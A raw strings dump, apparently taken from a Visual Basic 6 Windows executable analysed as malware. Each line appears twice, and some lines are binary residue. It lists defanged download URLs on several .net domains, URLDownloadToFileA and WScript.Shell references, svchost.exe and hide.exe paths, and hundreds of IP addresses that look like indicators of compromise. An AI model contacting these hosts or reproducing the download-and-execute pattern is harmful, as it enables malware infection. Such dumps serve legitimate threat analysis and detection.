BE LIABLE FOR CONSEQUENTIAL, PUNITIVE, AND CERTAIN OTHER DAMAGES. SEE
BE LIABLE FOR CONSEQUENTIAL, PUNITIVE, AND CERTAIN OTHER DAMAGES. SEE
4hXXps://VVV.verisign.com/repository/verisignlogo.gif0
4hXXps://VVV.verisign.com/repository/verisignlogo.gif0
hXXps://VVV.verisign.com/CPS0b
hXXps://VVV.verisign.com/CPS0b
hXXp://VVV.microsoft.com/vbasic 0
hXXp://VVV.microsoft.com/vbasic 0
Bo.pS
Bo.pS
|%F~":
|%F~":
J.wxn
J.wxn
kEyH
kEyH
9/}Cmd
9/}Cmd
UrlW
UrlW
DownUrlW
DownUrlW
BakUrlWW
BakUrlWW
KERNEL32.DLL
KERNEL32.DLL
MSVBVM60.DLL
MSVBVM60.DLL
USER32.DLL
USER32.DLL
P2P.dll
P2P.dll
\notepad.vbp
\notepad.vbp
hXXp://VVV.pc918.net/file.txt
hXXp://VVV.pc918.net/file.txt
hXXp://VVV.yswm.net/file.txt
hXXp://VVV.yswm.net/file.txt
hXXp://VVV.v138.net/file.txt
hXXp://VVV.v138.net/file.txt
hXXp://VVV.v345.net/file.txt
hXXp://VVV.v345.net/file.txt
hXXp://VVV.ahwm.net/file.txt
hXXp://VVV.ahwm.net/file.txt
~DFA1039.tmp
~DFA1039.tmp
\Set.dat
\Set.dat
\win.ini
\win.ini
\sys.dat
\sys.dat
\system32\mswinsck.ocx
\system32\mswinsck.ocx
\set.ini
\set.ini
hXXp://user.yswm.net/yswm/
hXXp://user.yswm.net/yswm/
hXXp://user.yswm.net/so118/
hXXp://user.yswm.net/so118/
hide.exe
hide.exe
\system32\svchost.exe
\system32\svchost.exe
DownUrl
DownUrl
yswm.runsoft
yswm.runsoft
eWindowStyle
eWindowStyle
Hotkey
Hotkey
\Addico.ico
\Addico.ico
The specified file is either a named or anonymous pipe
The specified file is either a named or anonymous pipe
WScript.Shell
WScript.Shell
2c49f800-c2dd-11cf-9ad6-0080c7e7b78d
2c49f800-c2dd-11cf-9ad6-0080c7e7b78d
RemotePort
RemotePort
LocalPort
LocalPort
YThe argument passed to a function was not in the correct format or in the specified range
YThe argument passed to a function was not in the correct format or in the specified range
6.00.8169
6.00.8169
is a registered trademark of Microsoft Corporation. Windows(tm) is a trademark of Microsoft Corporation.
is a registered trademark of Microsoft Corporation. Windows(tm) is a trademark of Microsoft Corporation.
&LocalPort
&LocalPort
Socket has encountered an error:Returns/Sets the name used to identify the remote computer?Returns/Sets the port to be connected to on the remote computer0Returns/Sets the port used on the local computer*Returns the state of the socket connection7Returns the number of bytes received on this connection
Socket has encountered an error:Returns/Sets the name used to identify the remote computer?Returns/Sets the port to be connected to on the remote computer0Returns/Sets the port used on the local computer*Returns the state of the socket connection7Returns the number of bytes received on this connection
TCP protocol
TCP protocol
UDP protocol
UDP protocol
Error occurred;Occurs when data has been received from the remote computer%Occurs connect operation is completed4Occurs when a remote client is attempting to connect*Occurs when the connection has been closed%Occurs during process of sending data Occurs after a send operation has completed
Error occurred;Occurs when data has been received from the remote computer%Occurs connect operation is completed4Occurs when a remote client is attempting to connect*Occurs when the connection has been closed%Occurs during process of sending data Occurs after a send operation has completed
Protocol Constants)Binds socket to specific port and adapter
Protocol Constants)Binds socket to specific port and adapter
Unsupported variant types
Unsupported variant types
"Invalid operation at current state
"Invalid operation at current state
Invalid type for %s property,%s property should be in the range %ld - %ld
Invalid type for %s property,%s property should be in the range %ld - %ld
The operation is canceled
The operation is canceled
=Socket is non-blocking and the specified operation will block A blocking winsock operation is in progressAThe operation is completed. No blocking operation is in progress.
=Socket is non-blocking and the specified operation will block A blocking winsock operation is in progressAThe operation is completed. No blocking operation is in progress.
Destination address is requiredAThe datagram is too large to fit into the buffer and is truncated3The specified port is the wrong type of this socket
Destination address is requiredAThe datagram is too large to fit into the buffer and is truncated3The specified port is the wrong type of this socket
Option unknown, or unsupported#The specified port is not supported0Socket type not supported in this address family>Socket is not a type that supports connection oriented service
Option unknown, or unsupported#The specified port is not supported0Socket type not supported in this address family>Socket is not a type that supports connection oriented service
Protocol family not supported
Protocol family not supported
Address Family is not supported
Address Family is not supported
Network subsystem is unavailable WINSOCK.DLL version out of range"WinsockInit should be called first
Network subsystem is unavailable WINSOCK.DLL version out of range"WinsockInit should be called first
%original file name%.exe_516_rwx_00401000_00038000:
}8!"###"!
}8!"###"!
!oOZ
!oOZ
vb6chs.dll
vb6chs.dll
RunExeModel
RunExeModel
%Program Files%\Microsoft Visual Studio\VB98\VB6.OLB
%Program Files%\Microsoft Visual Studio\VB98\VB6.OLB
D:\drivers\
D:\drivers\
\olelib.tlb
\olelib.tlb
DeleteUrlCacheEntryA
DeleteUrlCacheEntryA
F%System%\stdole2.tlb
F%System%\stdole2.tlb
epldrive.dll
epldrive.dll
mksparse.dll
mksparse.dll
DiskVolume.dll
DiskVolume.dll
oleaut32.dll
oleaut32.dll
shell32.dll
shell32.dll
winmm.dll
winmm.dll
CreatePipe
CreatePipe
ntdll.dll
ntdll.dll
%System%\msvbvm60.dll\3
%System%\msvbvm60.dll\3
VBA6.DLL
VBA6.DLL
URLMON.DLL
URLMON.DLL
URLDownloadToFileA
URLDownloadToFileA
.text
.text
`.data
`.data
.rsrc
.rsrc
.reloc
.reloc
MSWNSK98.chm
MSWNSK98.chm
hhctrl.ocx
hhctrl.ocx
CLSID\{ADB880A6-D8FF-11CF-9377-00AA003B7A11}\InprocServer32
CLSID\{ADB880A6-D8FF-11CF-9377-00AA003B7A11}\InprocServer32
MSWINSCK.OCX
MSWINSCK.OCX
"255.255.255.255
"255.255.255.255
"6.00.8169
"6.00.8169
WSOCK32.dll
WSOCK32.dll
KERNEL32.dll
KERNEL32.dll
USER32.dll
USER32.dll
ole32.dll
ole32.dll
ADVAPI32.dll
ADVAPI32.dll
OLEAUT32.dll
OLEAUT32.dll
GDI32.dll
GDI32.dll
GetProcessHeap
GetProcessHeap
GetWindowsDirectoryA
GetWindowsDirectoryA
GetKeyState
GetKeyState
CreateDialogIndirectParamA
CreateDialogIndirectParamA
RegCloseKey
RegCloseKey
RegCreateKeyExA
RegCreateKeyExA
RegOpenKeyExA
RegOpenKeyExA
RegDeleteKeyA
RegDeleteKeyA
RegEnumKeyExA
RegEnumKeyExA
RegOpenKeyA
RegOpenKeyA
GetViewportExtEx
GetViewportExtEx
SetViewportExtEx
SetViewportExtEx
SetViewportOrgEx
SetViewportOrgEx
"%s%s.DLL
"%s%s.DLL
%s%s.DLL
%s%s.DLL
%u\%s.dll
%u\%s.dll
{lX-X-X-XX-XXXXXX}
{lX-X-X-XX-XXXXXX}
CLSID\%s
CLSID\%s
%s Object
%s Object
%s.%s.%ld
%s.%s.%ld
%s.%s
%s.%s
%s.%s\CurVer
%s.%s\CurVer
%s\InprocServer
%s\InprocServer
VERSION.DLL
VERSION.DLL
%ld - %s
%ld - %s
stdole2.tlbWWW
stdole2.tlbWWW
hsckTCPProtocolWW
hsckTCPProtocolWW
FsckUDPProtocolWWd
FsckUDPProtocolWWd
}|RemotePortWWd
}|RemotePortWWd
7LocalPortWWWd
7LocalPortWWWd
0ZBsckGetNotSupportedWW
0ZBsckGetNotSupportedWW
sckSetNotSupportedWW
sckSetNotSupportedWW
sckUnsupportedWW
sckUnsupportedWW
sckMsgTooBig
sckMsgTooBig
sckPortNotSupportedW
sckPortNotSupportedW
MSWinSck.OcxWW
MSWinSck.OcxWW
MSWNSK98.chmWW
MSWNSK98.chmWW
TCP protocolWW
TCP protocolWW
UDP protocolWW
UDP protocolWW
Returns/Sets the port to be connected to on the remote computerWWW0
Returns/Sets the port to be connected to on the remote computerWWW0
Returns/Sets the port used on the local computerWW*
Returns/Sets the port used on the local computerWW*
Binds socket to specific port and adapterW:
Binds socket to specific port and adapterW:
Occurs connect operation is completedW4
Occurs connect operation is completedW4
Occurs after a send operation has completedWWW
Occurs after a send operation has completedWWW
The argument passed to a function was not in the correct format or in the specified rangeW
The argument passed to a function was not in the correct format or in the specified rangeW
Unsupported variant typesW"
Unsupported variant typesW"
Invalid operation at current state
Invalid operation at current state
The operation is canceledW
The operation is canceledW
Socket is non-blocking and the specified operation will blockW
Socket is non-blocking and the specified operation will blockW
A blocking winsock operation is in progressWWWA
A blocking winsock operation is in progressWWWA
The operation is completed. No blocking operation is in progress.W
The operation is completed. No blocking operation is in progress.W
The specified port is not supportedWWW
The specified port is not supportedWWW
?$?0?6?
?$?0?6?
4'484%5-5
4'484%5-5
mswinsck.dbg
mswinsck.dbg
=VVV.verisign.com/repository/CPS Incorp. by Ref.,LIAB.LTD(c)961>0
=VVV.verisign.com/repository/CPS Incorp. by Ref.,LIAB.LTD(c)961>0
'hXXps://VVV.verisign.com/repository/CPS
'hXXps://VVV.verisign.com/repository/CPS
This certificate incorporates by reference, and its use is strictly
This certificate incorporates by reference, and its use is strictly
subject to, the VeriSign Certification Practice Statement (CPS)
subject to, the VeriSign Certification Practice Statement (CPS)
hXXps://VVV.verisign.com; by E-mail at CPS-requests@verisign.com; or
hXXps://VVV.verisign.com; by E-mail at CPS-requests@verisign.com; or
USA Copyright (c)1996 VeriSign, Inc. All Rights Reserved. CERTAIN
USA Copyright (c)1996 VeriSign, Inc. All Rights Reserved. CERTAIN
WARNING: THE USE OF THIS CERTIFICATE IS STRICTLY SUBJECT TO THE
WARNING: THE USE OF THIS CERTIFICATE IS STRICTLY SUBJECT TO THE
VERISIGN CERTIFICATION PRACTICE STATEMENT. THE ISSUING AUTHORITY
VERISIGN CERTIFICATION PRACTICE STATEMENT. THE ISSUING AUTHORITY
DISCLAIMS CERTAIN IMPLIED AND EXPRESS WARRANTIES, INCLUDING WARRANTIES
DISCLAIMS CERTAIN IMPLIED AND EXPRESS WARRANTIES, INCLUDING WARRANTIES
BE LIABLE FOR CONSEQUENTIAL, PUNITIVE, AND CERTAIN OTHER DAMAGES. SEE
BE LIABLE FOR CONSEQUENTIAL, PUNITIVE, AND CERTAIN OTHER DAMAGES. SEE
4hXXps://VVV.verisign.com/repository/verisignlogo.gif0
4hXXps://VVV.verisign.com/repository/verisignlogo.gif0
hXXps://VVV.verisign.com/CPS0b
hXXps://VVV.verisign.com/CPS0b
hXXp://VVV.microsoft.com/vbasic 0
hXXp://VVV.microsoft.com/vbasic 0
Bo.pS
Bo.pS
|%F~":
|%F~":
J.wxn
J.wxn
kEyH
kEyH
9/}Cmd
9/}Cmd
UrlW
UrlW
DownUrlW
DownUrlW
BakUrlWW
BakUrlWW
KERNEL32.DLL
KERNEL32.DLL
MSVBVM60.DLL
MSVBVM60.DLL
USER32.DLL
USER32.DLL
P2P.dll
P2P.dll
\notepad.vbp
\notepad.vbp
hXXp://VVV.pc918.net/file.txt
hXXp://VVV.pc918.net/file.txt
hXXp://VVV.yswm.net/file.txt
hXXp://VVV.yswm.net/file.txt
hXXp://VVV.v138.net/file.txt
hXXp://VVV.v138.net/file.txt
hXXp://VVV.v345.net/file.txt
hXXp://VVV.v345.net/file.txt
hXXp://VVV.ahwm.net/file.txt
hXXp://VVV.ahwm.net/file.txt
~DFA1039.tmp
~DFA1039.tmp
\Set.dat
\Set.dat
\win.ini
\win.ini
\sys.dat
\sys.dat
\system32\mswinsck.ocx
\system32\mswinsck.ocx
\set.ini
\set.ini
hXXp://user.yswm.net/yswm/
hXXp://user.yswm.net/yswm/
hXXp://user.yswm.net/so118/
hXXp://user.yswm.net/so118/
hide.exe
hide.exe
\system32\svchost.exe
\system32\svchost.exe
DownUrl
DownUrl
yswm.runsoft
yswm.runsoft
eWindowStyle
eWindowStyle
Hotkey
Hotkey
\Addico.ico
\Addico.ico
The specified file is either a named or anonymous pipe
The specified file is either a named or anonymous pipe
WScript.Shell
WScript.Shell
2c49f800-c2dd-11cf-9ad6-0080c7e7b78d
2c49f800-c2dd-11cf-9ad6-0080c7e7b78d
RemotePort
RemotePort
LocalPort
LocalPort
YThe argument passed to a function was not in the correct format or in the specified range
YThe argument passed to a function was not in the correct format or in the specified range
6.00.8169
6.00.8169
is a registered trademark of Microsoft Corporation. Windows(tm) is a trademark of Microsoft Corporation.
is a registered trademark of Microsoft Corporation. Windows(tm) is a trademark of Microsoft Corporation.
&LocalPort
&LocalPort
Socket has encountered an error:Returns/Sets the name used to identify the remote computer?Returns/Sets the port to be connected to on the remote computer0Returns/Sets the port used on the local computer*Returns the state of the socket connection7Returns the number of bytes received on this connection
Socket has encountered an error:Returns/Sets the name used to identify the remote computer?Returns/Sets the port to be connected to on the remote computer0Returns/Sets the port used on the local computer*Returns the state of the socket connection7Returns the number of bytes received on this connection
TCP protocol
TCP protocol
UDP protocol
UDP protocol
Error occurred;Occurs when data has been received from the remote computer%Occurs connect operation is completed4Occurs when a remote client is attempting to connect*Occurs when the connection has been closed%Occurs during process of sending data Occurs after a send operation has completed
Error occurred;Occurs when data has been received from the remote computer%Occurs connect operation is completed4Occurs when a remote client is attempting to connect*Occurs when the connection has been closed%Occurs during process of sending data Occurs after a send operation has completed
Protocol Constants)Binds socket to specific port and adapter
Protocol Constants)Binds socket to specific port and adapter
Unsupported variant types
Unsupported variant types
"Invalid operation at current state
"Invalid operation at current state
Invalid type for %s property,%s property should be in the range %ld - %ld
Invalid type for %s property,%s property should be in the range %ld - %ld
The operation is canceled
The operation is canceled
=Socket is non-blocking and the specified operation will block A blocking winsock operation is in progressAThe operation is completed. No blocking operation is in progress.
=Socket is non-blocking and the specified operation will block A blocking winsock operation is in progressAThe operation is completed. No blocking operation is in progress.
Destination address is requiredAThe datagram is too large to fit into the buffer and is truncated3The specified port is the wrong type of this socket
Destination address is requiredAThe datagram is too large to fit into the buffer and is truncated3The specified port is the wrong type of this socket
Option unknown, or unsupported#The specified port is not supported0Socket type not supported in this address family>Socket is not a type that supports connection oriented service
Option unknown, or unsupported#The specified port is not supported0Socket type not supported in this address family>Socket is not a type that supports connection oriented service
Protocol family not supported
Protocol family not supported
Address Family is not supported
Address Family is not supported
Network subsystem is unavailable WINSOCK.DLL version out of range"WinsockInit should be called first
Network subsystem is unavailable WINSOCK.DLL version out of range"WinsockInit should be called first
%original file name%.exe_516_rwx_018C1000_0003E000:
VB5!6&vb6chs.dll
VB5!6&vb6chs.dll
GetWebSoure
GetWebSoure
%System%\msvbvm60.dll\3
%System%\msvbvm60.dll\3
epldrive.dll
epldrive.dll
mksparse.dll
mksparse.dll
DiskVolume.dll
DiskVolume.dll
urlmon
urlmon
URLDownloadToFileA
URLDownloadToFileA
oleaut32.dll
oleaut32.dll
shell32.dll
shell32.dll
psapi.dll
psapi.dll
CreatePipe
CreatePipe
WSOCK32.DLL
WSOCK32.DLL
wininet.dll
wininet.dll
InternetOpenUrlA
InternetOpenUrlA
DeleteUrlCacheEntryA
DeleteUrlCacheEntryA
kernel32.dll
kernel32.dll
VBA6.DLL
VBA6.DLL
advapi32.dll
advapi32.dll
RegOpenKeyA
RegOpenKeyA
RegOpenKeyExA
RegOpenKeyExA
RegCloseKey
RegCloseKey
RegCreateKeyA
RegCreateKeyA
RegDeleteKeyA
RegDeleteKeyA
RegEnumKeyExA
RegEnumKeyExA
RegEnumKeyA
RegEnumKeyA
ntdll.dll
ntdll.dll
.rsrc
.rsrc
t(>.TO8
t(>.TO8
GetUrlSourceoP
GetUrlSourceoP
C:\Program Fi(
C:\Program Fi(
6.OLB>
6.OLB>
artxKeyA
artxKeyA
A6.DLLc ,
A6.DLLc ,
WINDOWS\s
WINDOWS\s
.vm60
.vm60
O.text
O.text
stdole2.tlbWWW
stdole2.tlbWWW
KERNEL32.DLL
KERNEL32.DLL
MSVBVM60.DLL
MSVBVM60.DLL
1.dll
1.dll
E.PSw$
E.PSw$
vb6chs.dll*
vb6chs.dll*
C:\Prog
C:\Prog
6.OLBWp
6.OLBWp
A6.DLL
A6.DLL
}x.jIE?b
}x.jIE?b
F.lh*(
F.lh*(
.KQRy>*f
.KQRy>*f
Z%fs#r&
Z%fs#r&
.Fy/* n>
.Fy/* n>
URLW
URLW
yslm.dll
yslm.dll
.text
.text
.data
.data
612121212121
612121212121
vb6chs.dll
vb6chs.dll
%Program Files%\Microsoft Visual Studio\VB98\VB6.OLB
%Program Files%\Microsoft Visual Studio\VB98\VB6.OLB
`.data
`.data
202.110.75.114
202.110.75.114
123.7.177.250
123.7.177.250
218.28.55.126
218.28.55.126
218.29.109.10
218.29.109.10
182.116.61.212
182.116.61.212
222.89.153.117
222.89.153.117
125.45.53.136
125.45.53.136
61.136.66.242
61.136.66.242
218.28.65.92
218.28.65.92
222.88.151.61
222.88.151.61
123.7.38.10
123.7.38.10
218.29.130.250
218.29.130.250
125.46.5.166
125.46.5.166
123.7.88.173
123.7.88.173
123.7.18.94
123.7.18.94
61.53.65.4
61.53.65.4
218.28.242.42
218.28.242.42
123.13.205.77
123.13.205.77
123.15.36.122
123.15.36.122
125.40.237.163
125.40.237.163
218.28.238.10
218.28.238.10
61.163.32.75
61.163.32.75
61.136.64.142
61.136.64.142
218.28.164.138
218.28.164.138
61.136.66.22
61.136.66.22
61.163.37.3
61.163.37.3
218.28.138.22
218.28.138.22
218.28.62.50
218.28.62.50
182.116.63.77
182.116.63.77
218.28.5.202
218.28.5.202
218.28.139.242
218.28.139.242
61.136.99.70
61.136.99.70
222.88.196.183
222.88.196.183
61.54.227.67
61.54.227.67
218.29.217.170
218.29.217.170
218.29.153.198
218.29.153.198
222.88.253.140
222.88.253.140
218.29.124.34
218.29.124.34
221.13.204.30
221.13.204.30
222.88.154.130
222.88.154.130
219.150.136.82
219.150.136.82
218.28.224.122
218.28.224.122
221.13.206.210
221.13.206.210
221.13.207.106
221.13.207.106
125.46.21.214
125.46.21.214
61.163.178.181
61.163.178.181
218.28.51.122
218.28.51.122
219.156.157.89
219.156.157.89
125.46.76.187
125.46.76.187
218.29.230.10
218.29.230.10
218.29.56.103
218.29.56.103
125.46.93.210
125.46.93.210
123.7.63.67
123.7.63.67
125.46.23.186
125.46.23.186
218.28.57.150
218.28.57.150
123.7.14.96
123.7.14.96
61.163.180.50
61.163.180.50
222.89.156.215
222.89.156.215
218.28.8.90
218.28.8.90
218.29.162.30
218.29.162.30
218.28.5.42
218.28.5.42
218.29.170.62
218.29.170.62
61.158.175.71
61.158.175.71
123.13.226.106
123.13.226.106
218.29.230.50
218.29.230.50
125.45.61.235
125.45.61.235
218.29.5.177
218.29.5.177
218.28.87.201
218.28.87.201
218.28.23.210
218.28.23.210
218.28.78.91
218.28.78.91
221.13.138.218
221.13.138.218
221.13.153.158
221.13.153.158
218.28.108.225
218.28.108.225
123.15.46.2
123.15.46.2
125.46.15.2
125.46.15.2
218.28.167.148
218.28.167.148
219.156.168.48
219.156.168.48
61.163.180.55
61.163.180.55
218.28.165.242
218.28.165.242
202.110.67.50
202.110.67.50
222.141.69.25
222.141.69.25
123.7.118.198
123.7.118.198
182.116.57.9
182.116.57.9
123.15.5.150
123.15.5.150
218.28.143.3
218.28.143.3
61.136.115.247
61.136.115.247
61.136.115.234
61.136.115.234
222.89.46.82
222.89.46.82
222.88.189.118
222.88.189.118
222.140.93.130
222.140.93.130
61.163.38.45
61.163.38.45
218.28.172.43
218.28.172.43
218.28.124.252
218.28.124.252
61.136.99.218
61.136.99.218
222.88.195.41
222.88.195.41
219.150.127.8
219.150.127.8
61.163.32.11
61.163.32.11
222.88.162.146
222.88.162.146
218.28.170.242
218.28.170.242
123.15.46.162
123.15.46.162
125.40.237.198
125.40.237.198
61.163.37.1
61.163.37.1
218.29.133.210
218.29.133.210
125.46.15.146
125.46.15.146
221.14.18.213
221.14.18.213
218.29.69.162
218.29.69.162
218.28.78.229
218.28.78.229
61.53.64.107
61.53.64.107
218.28.138.211
218.28.138.211
219.156.138.66
219.156.138.66
61.163.36.5
61.163.36.5
222.88.222.166
222.88.222.166
218.28.30.234
218.28.30.234
222.140.93.90
222.140.93.90
222.88.107.130
222.88.107.130
219.154.133.18
219.154.133.18
218.29.220.242
218.29.220.242
61.136.64.62
61.136.64.62
218.28.254.66
218.28.254.66
42.228.0.138
42.228.0.138
218.28.111.70
218.28.111.70
218.28.53.246
218.28.53.246
61.54.213.39
61.54.213.39
218.28.114.170
218.28.114.170
123.7.63.221
123.7.63.221
61.163.74.214
61.163.74.214
171.8.149.30
171.8.149.30
219.156.158.153
219.156.158.153
123.13.226.77
123.13.226.77
123.15.45.59
123.15.45.59
125.46.14.238
125.46.14.238
218.28.115.226
218.28.115.226
123.7.63.24
123.7.63.24
218.28.112.130
218.28.112.130
61.54.5.202
61.54.5.202
219.156.138.129
219.156.138.129
125.46.97.59
125.46.97.59
123.7.84.147
123.7.84.147
61.163.123.55
61.163.123.55
222.88.240.84
222.88.240.84
123.7.110.159
123.7.110.159
61.158.175.99
61.158.175.99
222.89.155.110
222.89.155.110
61.53.68.34
61.53.68.34
218.28.61.78
218.28.61.78
61.136.80.21
61.136.80.21
123.149.254.70
123.149.254.70
202.110.75.26
202.110.75.26
125.40.237.173
125.40.237.173
125.46.1.54
125.46.1.54
123.55.118.50
123.55.118.50
218.28.224.98
218.28.224.98
218.28.108.201
218.28.108.201
218.29.155.254
218.29.155.254
202.110.75.118
202.110.75.118
123.15.32.230
123.15.32.230
218.28.50.138
218.28.50.138
61.163.32.4
61.163.32.4
125.46.0.46
125.46.0.46
218.29.96.162
218.29.96.162
221.13.156.162
221.13.156.162
218.28.185.108
218.28.185.108
123.7.178.234
123.7.178.234
219.150.248.82
219.150.248.82
125.46.5.162
125.46.5.162
218.29.87.202
218.29.87.202
61.163.38.17
61.163.38.17
61.136.82.251
61.136.82.251
123.15.55.250
123.15.55.250
222.88.82.83
222.88.82.83
61.54.5.120
61.54.5.120
218.28.219.118
218.28.219.118
202.110.75.234
202.110.75.234
123.7.180.44
123.7.180.44
125.40.237.190
125.40.237.190
123.7.87.84
123.7.87.84
61.163.108.178
61.163.108.178
218.28.56.150
218.28.56.150
202.110.73.172
202.110.73.172
221.14.18.193
221.14.18.193
61.163.37.25
61.163.37.25
222.89.46.178
222.89.46.178
218.29.222.35
218.29.222.35
1.192.144.156
1.192.144.156
218.28.237.142
218.28.237.142
202.110.67.71
202.110.67.71
61.163.163.236
61.163.163.236
125.46.5.218
125.46.5.218
222.88.212.250
222.88.212.250
123.13.223.16
123.13.223.16
61.163.32.34
61.163.32.34
61.163.33.107
61.163.33.107
61.136.115.131
61.136.115.131
61.53.137.141
61.53.137.141
125.46.5.110
125.46.5.110
61.158.175.58
61.158.175.58
61.158.171.6
61.158.171.6
61.163.35.9
61.163.35.9
222.88.114.81
222.88.114.81
123.7.14.122
123.7.14.122
218.28.213.154
218.28.213.154
218.28.91.20
218.28.91.20
219.157.73.230
219.157.73.230
222.89.10.116
222.89.10.116
218.28.170.122
218.28.170.122
202.110.67.7
202.110.67.7
125.46.14.78
125.46.14.78
202.110.84.42
202.110.84.42
125.46.53.244
125.46.53.244
218.28.101.166
218.28.101.166
61.136.71.62
61.136.71.62
222.85.38.112
222.85.38.112
61.54.225.28
61.54.225.28
218.28.188.114
218.28.188.114
222.138.67.15
222.138.67.15
61.54.3.130
61.54.3.130
125.46.77.82
125.46.77.82
61.163.180.71
61.163.180.71
123.7.18.64
123.7.18.64
123.15.37.142
123.15.37.142
61.54.227.75
61.54.227.75
61.163.38.47
61.163.38.47
218.28.87.182
218.28.87.182
115.56.226.202
115.56.226.202
125.46.111.142
125.46.111.142
125.46.6.74
125.46.6.74
202.110.72.179
202.110.72.179
222.139.212.225
222.139.212.225
202.110.73.170
202.110.73.170
61.163.162.27
61.163.162.27
123.161.207.10
123.161.207.10
218.29.122.202
218.29.122.202
123.15.52.18
123.15.52.18
218.28.67.202
218.28.67.202
61.136.82.58
61.136.82.58
218.29.8.6
218.29.8.6
222.89.46.39
222.89.46.39
218.28.125.246
218.28.125.246
222.88.212.34
222.88.212.34
61.163.164.107
61.163.164.107
61.163.7.196
61.163.7.196
222.140.93.114
222.140.93.114
202.110.93.238
202.110.93.238
218.28.124.67
218.28.124.67
123.7.51.132
123.7.51.132
123.7.113.48
123.7.113.48
222.88.150.18
222.88.150.18
222.89.155.29
222.89.155.29
218.29.69.66
218.29.69.66
222.88.66.130
222.88.66.130
218.29.234.114
218.29.234.114
222.138.66.77
222.138.66.77
123.7.182.57
123.7.182.57
61.163.92.162
61.163.92.162
219.150.255.11
219.150.255.11
222.89.157.146
222.89.157.146
218.29.97.38
218.29.97.38
218.29.55.10
218.29.55.10
218.28.153.30
218.28.153.30
221.13.153.30
221.13.153.30
218.28.22.227
218.28.22.227
61.163.38.43
61.163.38.43
222.88.208.38
222.88.208.38
218.28.54.90
218.28.54.90
219.150.132.68
219.150.132.68
218.29.220.178
218.29.220.178
218.28.49.84
218.28.49.84
125.46.81.250
125.46.81.250
221.13.152.106
221.13.152.106
61.163.32.41
61.163.32.41
218.28.5.210
218.28.5.210
61.163.163.138
61.163.163.138
123.162.220.148
123.162.220.148
123.7.18.99
123.7.18.99
222.89.130.158
222.89.130.158
218.28.17.90
218.28.17.90
218.28.68.158
218.28.68.158
182.123.224.10
182.123.224.10
218.29.4.116
218.29.4.116
218.28.142.228
218.28.142.228
218.28.143.2
218.28.143.2
123.7.38.16
123.7.38.16
61.54.242.79
61.54.242.79
222.89.39.122
222.89.39.122
218.28.96.54
218.28.96.54
202.110.72.181
202.110.72.181
202.110.72.109
202.110.72.109
61.53.64.226
61.53.64.226
218.28.124.198
218.28.124.198
222.88.212.146
222.88.212.146
61.158.175.7
61.158.175.7
222.88.190.51
222.88.190.51
61.163.58.96
61.163.58.96
123.7.63.189
123.7.63.189
61.54.245.10
61.54.245.10
61.158.169.92
61.158.169.92
218.29.131.154
218.29.131.154
222.88.149.52
222.88.149.52
222.88.154.40
222.88.154.40
123.7.54.92
123.7.54.92
218.28.216.30
218.28.216.30
61.163.94.210
61.163.94.210
125.46.12.218
125.46.12.218
218.28.170.252
218.28.170.252
123.7.180.35
123.7.180.35
218.28.59.78
218.28.59.78
218.28.237.250
218.28.237.250
221.13.153.114
221.13.153.114
222.89.152.138
222.89.152.138
1.192.146.5
1.192.146.5
218.29.227.58
218.29.227.58
123.7.52.162
123.7.52.162
171.8.149.47
171.8.149.47
123.7.82.86
123.7.82.86
218.28.67.58
218.28.67.58
218.28.54.66
218.28.54.66
123.7.118.135
123.7.118.135
222.89.133.107
222.89.133.107
123.7.51.108
123.7.51.108
125.46.33.130
125.46.33.130
123.7.183.51
123.7.183.51
218.28.210.50
218.28.210.50
125.46.7.14
125.46.7.14
218.28.91.10
218.28.91.10
61.163.38.51
61.163.38.51
123.7.114.138
123.7.114.138
125.46.95.229
125.46.95.229
61.163.164.89
61.163.164.89
61.136.64.26
61.136.64.26
218.28.88.214
218.28.88.214
221.13.207.154
221.13.207.154
222.141.17.7
222.141.17.7
171.15.132.8
171.15.132.8
202.110.72.142
202.110.72.142
125.40.199.207
125.40.199.207
222.89.157.147
222.89.157.147
61.163.212.2
61.163.212.2
123.7.182.97
123.7.182.97
221.13.156.194
221.13.156.194
222.89.155.248
222.89.155.248
61.163.27.6
61.163.27.6
222.85.37.249
222.85.37.249
123.7.87.102
123.7.87.102
202.110.67.12
202.110.67.12
123.54.153.67
123.54.153.67
222.88.78.150
222.88.78.150
218.29.94.178
218.29.94.178
222.139.221.84
222.139.221.84
222.89.152.114
222.89.152.114
218.29.8.13
218.29.8.13
123.7.51.44
123.7.51.44
171.8.66.112
171.8.66.112
61.54.226.242
61.54.226.242
182.116.57.116
182.116.57.116
221.13.128.115
221.13.128.115
218.28.31.205
218.28.31.205
42.228.6.158
42.228.6.158
123.7.51.204
123.7.51.204
219.156.168.39
219.156.168.39
123.7.180.32
123.7.180.32
123.7.83.83
123.7.83.83
61.163.38.129
61.163.38.129
123.54.71.154
123.54.71.154
61.54.227.12
61.54.227.12
219.156.157.179
219.156.157.179
218.29.55.176
218.29.55.176
222.138.67.3
222.138.67.3
218.28.56.214
218.28.56.214
123.7.18.87
123.7.18.87
123.7.81.233
123.7.81.233
61.163.235.68
61.163.235.68
61.163.32.70
61.163.32.70
123.149.21.54
123.149.21.54
222.88.209.170
222.88.209.170
61.54.4.22
61.54.4.22
218.28.165.138
218.28.165.138
125.46.0.114
125.46.0.114
202.110.75.174
202.110.75.174
218.28.58.234
218.28.58.234
218.29.230.162
218.29.230.162
61.163.105.86
61.163.105.86
125.46.29.42
125.46.29.42
123.7.181.16
123.7.181.16
125.46.0.126
125.46.0.126
222.138.178.240
222.138.178.240
218.28.237.198
218.28.237.198
61.163.38.40
61.163.38.40
218.28.103.114
218.28.103.114
218.28.71.182
218.28.71.182
202.110.75.130
202.110.75.130
222.88.240.141
222.88.240.141
221.13.156.118
221.13.156.118
61.136.81.139
61.136.81.139
219.150.139.250
219.150.139.250
125.40.191.187
125.40.191.187
61.163.162.83
61.163.162.83
222.141.68.69
222.141.68.69
125.46.71.14
125.46.71.14
123.7.83.241
123.7.83.241
222.88.219.62
222.88.219.62
123.7.53.6
123.7.53.6
218.28.53.74
218.28.53.74
219.150.127.2
219.150.127.2
123.7.114.247
123.7.114.247
61.136.99.90
61.136.99.90
222.88.249.55
222.88.249.55
222.138.67.20
222.138.67.20
222.89.159.188
222.89.159.188
219.156.138.43
219.156.138.43
218.29.48.13
218.29.48.13
219.156.168.9
219.156.168.9
218.28.35.178
218.28.35.178
61.163.163.144
61.163.163.144
61.54.225.19
61.54.225.19
61.54.225.5
61.54.225.5
125.46.12.130
125.46.12.130
171.11.39.29
171.11.39.29
61.163.180.76
61.163.180.76
61.54.6.50
61.54.6.50
218.28.62.62
218.28.62.62
123.7.63.102
123.7.63.102
222.89.247.7
222.89.247.7
218.28.9.18
218.28.9.18
123.7.51.219
123.7.51.219
123.7.54.172
123.7.54.172
61.163.163.34
61.163.163.34
218.28.115.90
